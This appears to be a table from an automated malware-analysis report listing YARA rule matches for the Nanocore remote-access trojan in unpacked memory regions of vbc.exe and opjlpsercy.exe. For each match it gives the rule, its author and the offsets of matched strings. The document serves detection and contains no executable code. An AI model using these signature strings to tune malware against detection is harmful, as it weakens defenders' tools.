7.2.opjlpsercy.exe.3335116.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x99e7:$x1: NanoCore.ClientPluginHost 0x19c03:$x1: NanoCore.ClientPluginHost 0x26d6c:$x1: NanoCore.ClientPluginHost 0x2d2ba:$x1: NanoCore.ClientPluginHost 0x3328b:$x1: NanoCore.ClientPluginHost 0x3ccf7:$x1: NanoCore.ClientPluginHost 0x47122:$x1: NanoCore.ClientPluginHost 0x520ff:$x1: NanoCore.ClientPluginHost 0x5dea1:$x1: NanoCore.ClientPluginHost 0x73379:$x1: NanoCore.ClientPluginHost 0x9b5db:$x1: NanoCore.ClientPluginHost 0xaaa1b:$x1: NanoCore.ClientPluginHost 0xc28b7:$x1: NanoCore.ClientPluginHost 0xeab05:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x9a11:$x2: IClientNetworkHost 0x19c30:$x2: IClientNetworkHost 0x26da5:$x2: IClientNetworkHost 0x2d2f3:$x2: IClientNetworkHost 0x3ce54:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.3335116.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.3335116.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x99c2:$a: NanoCore 0x99e7:$a: NanoCore 0x9a40:$a: NanoCore 0x19bdd:$a: NanoCore 0x19c03:$a: NanoCore 0x19c5f:$a: NanoCore 0x26ab4:$a: NanoCore 0x26b0d:$a: NanoCore 0x26b40:$a: NanoCore 0x26d6c:$a: NanoCore 0x26de8:$a: NanoCore 0x27401:$a: NanoCore 0x2754a:$a: NanoCore 0x27a1e:$a: NanoCore 0x27d05:$a: NanoCore 0x27d1c:$a: NanoCore 0x2d2ba:$a: NanoCore
5.2.vbc.exe.33c9f42.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14dd7:$x1: NanoCore.ClientPluginHost 0x21f40:$x1: NanoCore.ClientPluginHost 0x2848e:$x1: NanoCore.ClientPluginHost 0x2e45f:$x1: NanoCore.ClientPluginHost 0x37ecb:$x1: NanoCore.ClientPluginHost 0x422f6:$x1: NanoCore.ClientPluginHost 0x4d2d3:$x1: NanoCore.ClientPluginHost 0x59075:$x1: NanoCore.ClientPluginHost 0x6e54d:$x1: NanoCore.ClientPluginHost 0x967af:$x1: NanoCore.ClientPluginHost 0xa5bef:$x1: NanoCore.ClientPluginHost 0xbda8b:$x1: NanoCore.ClientPluginHost 0xe5cd9:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e04:$x2: IClientNetworkHost 0x21f79:$x2: IClientNetworkHost 0x284c7:$x2: IClientNetworkHost 0x38028:$x2: IClientNetworkHost 0x4232f:$x2: IClientNetworkHost 0x4d2ed:$x2: IClientNetworkHost
5.2.vbc.exe.33c9f42.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.33c9f42.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14db1:$a: NanoCore 0x14dd7:$a: NanoCore 0x14e33:$a: NanoCore 0x21c88:$a: NanoCore 0x21ce1:$a: NanoCore 0x21d14:$a: NanoCore 0x21f40:$a: NanoCore 0x21fbc:$a: NanoCore 0x225d5:$a: NanoCore 0x2271e:$a: NanoCore 0x22bf2:$a: NanoCore 0x22ed9:$a: NanoCore 0x22ef0:$a: NanoCore 0x2848e:$a: NanoCore 0x28508:$a: NanoCore 0x2d0a5:$a: NanoCore 0x2e45f:$a: NanoCore 0x2e4a9:$a: NanoCore
5.2.vbc.exe.57b4c9f.30.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
5.2.vbc.exe.57b4c9f.30.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1a53c:$x2: NanoCore.ClientPluginHost 0x1d879:$s4: PipeCreated 0x1a529:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.219b958.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14e79:$x1: NanoCore.ClientPluginHost 0x2202f:$x1: NanoCore.ClientPluginHost 0x28659:$x1: NanoCore.ClientPluginHost 0x2e678:$x1: NanoCore.ClientPluginHost 0x3812f:$x1: NanoCore.ClientPluginHost 0x425a7:$x1: NanoCore.ClientPluginHost 0x4d6e5:$x1: NanoCore.ClientPluginHost 0x594d7:$x1: NanoCore.ClientPluginHost 0x65332:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14ea6:$x2: IClientNetworkHost 0x22068:$x2: IClientNetworkHost 0x28692:$x2: IClientNetworkHost 0x3828c:$x2: IClientNetworkHost 0x425e0:$x2: IClientNetworkHost 0x4d6ff:$x2: IClientNetworkHost 0x594f1:$x2: IClientNetworkHost 0x6536f:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.219b958.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x14e79:$x2: NanoCore.ClientPluginHost 0x2202f:$x2: NanoCore.ClientPluginHost 0x28659:$x2: NanoCore.ClientPluginHost 0x2e678:$x2: NanoCore.ClientPluginHost 0x3812f:$x2: NanoCore.ClientPluginHost 0x425a7:$x2: NanoCore.ClientPluginHost 0x4d6e5:$x2: NanoCore.ClientPluginHost 0x594d7:$x2: NanoCore.ClientPluginHost 0x65332:$x2: NanoCore.ClientPluginHost 0x15e48:$s2: FileCommand 0x39085:$s3: PipeExists 0x6a6b:$s4: PipeCreated 0x1a84a:$s4: PipeCreated 0x2214c:$s4: PipeCreated 0x28774:$s4: PipeCreated 0x2e756:$s4: PipeCreated 0x38325:$s4: PipeCreated 0x426f2:$s4: PipeCreated 0x4e71a:$s4: PipeCreated 0x5b282:$s4: PipeCreated
7.2.opjlpsercy.exe.219b958.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14e53:$a: NanoCore 0x14e79:$a: NanoCore 0x14ed5:$a: NanoCore 0x21d77:$a: NanoCore 0x21dd0:$a: NanoCore 0x21e03:$a: NanoCore 0x2202f:$a: NanoCore 0x220ab:$a: NanoCore 0x226c4:$a: NanoCore 0x2280d:$a: NanoCore 0x22ce1:$a: NanoCore 0x22fc8:$a: NanoCore 0x22fdf:$a: NanoCore 0x28659:$a: NanoCore 0x286d3:$a: NanoCore 0x2e678:$a: NanoCore 0x2e6c2:$a: NanoCore 0x2f31c:$a: NanoCore
5.2.vbc.exe.57b0000.29.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
5.2.vbc.exe.57b0000.29.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
5.2.vbc.exe.44c0000.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.vbc.exe.44c0000.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.2.vbc.exe.44c0000.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.44c0000.10.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.vbc.exe.55d0000.22.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
5.2.vbc.exe.55d0000.22.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1deb:$x2: NanoCore.ClientPluginHost 0x1f36:$s4: PipeCreated 0x1e05:$s5: IClientLoggingHost
5.2.vbc.exe.415058.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.vbc.exe.415058.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.2.vbc.exe.415058.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.415058.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.vbc.exe.55c0000.21.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3deb:$x1: NanoCore.ClientPluginHost 0x3f48:$x2: IClientNetworkHost
5.2.vbc.exe.55c0000.21.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3deb:$x2: NanoCore.ClientPluginHost 0x4d41:$s3: PipeExists 0x3fe1:$s4: PipeCreated 0x3e05:$s5: IClientLoggingHost
7.1.opjlpsercy.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.1.opjlpsercy.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
7.1.opjlpsercy.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.1.opjlpsercy.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.2.vbc.exe.1da0000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.1da0000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.1da0000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
5.2.vbc.exe.5620000.25.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.vbc.exe.5620000.25.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
5.2.vbc.exe.5620000.25.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.1.vbc.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.1.vbc.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.1.vbc.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.1.vbc.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.vbc.exe.5460000.19.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
5.2.vbc.exe.5460000.19.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
4.2.vbc.exe.1db1458.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.vbc.exe.1db1458.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.vbc.exe.1db1458.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.vbc.exe.1db1458.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.vbc.exe.55c0000.21.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
5.2.vbc.exe.55c0000.21.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.opjlpsercy.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
5.2.vbc.exe.4c60000.13.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
5.2.vbc.exe.4c60000.13.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
7.2.opjlpsercy.exe.3339f42.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14dd7:$x1: NanoCore.ClientPluginHost 0x21f40:$x1: NanoCore.ClientPluginHost 0x2848e:$x1: NanoCore.ClientPluginHost 0x2e45f:$x1: NanoCore.ClientPluginHost 0x37ecb:$x1: NanoCore.ClientPluginHost 0x422f6:$x1: NanoCore.ClientPluginHost 0x4d2d3:$x1: NanoCore.ClientPluginHost 0x59075:$x1: NanoCore.ClientPluginHost 0x6e54d:$x1: NanoCore.ClientPluginHost 0x967af:$x1: NanoCore.ClientPluginHost 0xa5bef:$x1: NanoCore.ClientPluginHost 0xbda8b:$x1: NanoCore.ClientPluginHost 0xe5cd9:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e04:$x2: IClientNetworkHost 0x21f79:$x2: IClientNetworkHost 0x284c7:$x2: IClientNetworkHost 0x38028:$x2: IClientNetworkHost 0x4232f:$x2: IClientNetworkHost 0x4d2ed:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.3339f42.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.3339f42.8.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14db1:$a: NanoCore 0x14dd7:$a: NanoCore 0x14e33:$a: NanoCore 0x21c88:$a: NanoCore 0x21ce1:$a: NanoCore 0x21d14:$a: NanoCore 0x21f40:$a: NanoCore 0x21fbc:$a: NanoCore 0x225d5:$a: NanoCore 0x2271e:$a: NanoCore 0x22bf2:$a: NanoCore 0x22ed9:$a: NanoCore 0x22ef0:$a: NanoCore 0x2848e:$a: NanoCore 0x28508:$a: NanoCore 0x2d0a5:$a: NanoCore 0x2e45f:$a: NanoCore 0x2e4a9:$a: NanoCore
7.2.opjlpsercy.exe.4430000.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.opjlpsercy.exe.4430000.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.4430000.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.4430000.10.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.opjlpsercy.exe.400000.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.opjlpsercy.exe.400000.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.400000.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
7.2.opjlpsercy.exe.3346174.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
7.2.opjlpsercy.exe.3346174.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
5.2.vbc.exe.57e0000.31.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
5.2.vbc.exe.57e0000.31.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
5.2.vbc.exe.4c60000.13.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
5.2.vbc.exe.4c60000.13.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
5.2.vbc.exe.57b0000.29.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
5.2.vbc.exe.57b0000.29.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
5.2.vbc.exe.5070000.17.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
5.2.vbc.exe.5070000.17.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.3173258.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
7.2.opjlpsercy.exe.3173258.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
7.2.opjlpsercy.exe.3173258.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
7.2.opjlpsercy.exe.3173258.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.vbc.exe.33c9f42.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
